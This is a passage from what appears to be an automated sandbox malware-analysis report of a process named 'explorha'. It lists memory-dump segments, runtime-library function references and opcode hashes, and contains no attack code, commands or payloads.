                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 3010677857-0
                                                                                                      • Opcode ID: 05ee87ddd27e704654334cd8d584d3048223ff21310e1b6e7af2c7e9520d499a
                                                                                                      • Instruction ID: 24e5de11303ad1e01c3ab8a14869339d3e1889bdac51bc28079acbf0097795ca
                                                                                                      • Opcode Fuzzy Hash: 05ee87ddd27e704654334cd8d584d3048223ff21310e1b6e7af2c7e9520d499a
                                                                                                      • Instruction Fuzzy Hash: EF8174B0A11B56BAD704EF78C845BD9FBA8FF49704F10421AF428D7681DBB4A624CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008804EF Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _SpinWait.LIBCONCRT ref: 0088054C
                                                                                                      • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00880558
                                                                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00880571
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0088059F
                                                                                                      • Concurrency::Context::Block.LIBCONCRT ref: 008805C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 1182035702-0
                                                                                                      • Opcode ID: 7f2cbedb5d4428b1f35366b455333c9d8a2644d7925ac163564deea5344e319e
                                                                                                      • Instruction ID: 071ea725f34ae6af319d2e64d94368df14ae01629bd801c84a4da60c9d56d631
                                                                                                      • Opcode Fuzzy Hash: 7f2cbedb5d4428b1f35366b455333c9d8a2644d7925ac163564deea5344e319e
                                                                                                      • Instruction Fuzzy Hash: 4A216070C012099ADFA4EFA8C8556EEB7F0FF15310F200559E165F6191EB719A48CF62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008931B6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 008931E4
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008931F3
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008932B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                      • String ID: pContext$switchState
                                                                                                      • API String ID: 2656283622-2660820399
                                                                                                      • Opcode ID: 9c8bab2af32fac1c4fd3d168f76f8893f2f71bbfbe68584609d0e89b2b3d5ab2
                                                                                                      • Instruction ID: e784610e0688bbf88d92d4188ce1626f5fecd378aa9275fbb83dcf04ce312820
                                                                                                      • Opcode Fuzzy Hash: 9c8bab2af32fac1c4fd3d168f76f8893f2f71bbfbe68584609d0e89b2b3d5ab2
                                                                                                      • Instruction Fuzzy Hash: AE31A475A00214ABCF09FFA8C885A6D7379FF44314F284565E825E7392DB34EF058791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008964AA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 008964FD
                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00896516
                                                                                                      • PMDtoOffset.LIBCMT ref: 0089653C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FindInstanceTargetType$Offset
                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                      • API String ID: 1467055271-2956939130
                                                                                                      • Opcode ID: ae87c9d35ebcb9de134ee3e3b30534ee7ec617c0dd30888f945684f5ecd979dd
                                                                                                      • Instruction ID: 092f25c222a32dd4eeb88902eaa846cff0540cace924b837631ac9311453a9c2
                                                                                                      • Opcode Fuzzy Hash: ae87c9d35ebcb9de134ee3e3b30534ee7ec617c0dd30888f945684f5ecd979dd
                                                                                                      • Instruction Fuzzy Hash: 44212772A002059FDF18FFA8DD06EAE37B8FB84720F1C8129E915D3284F734E9208695
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00898829 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
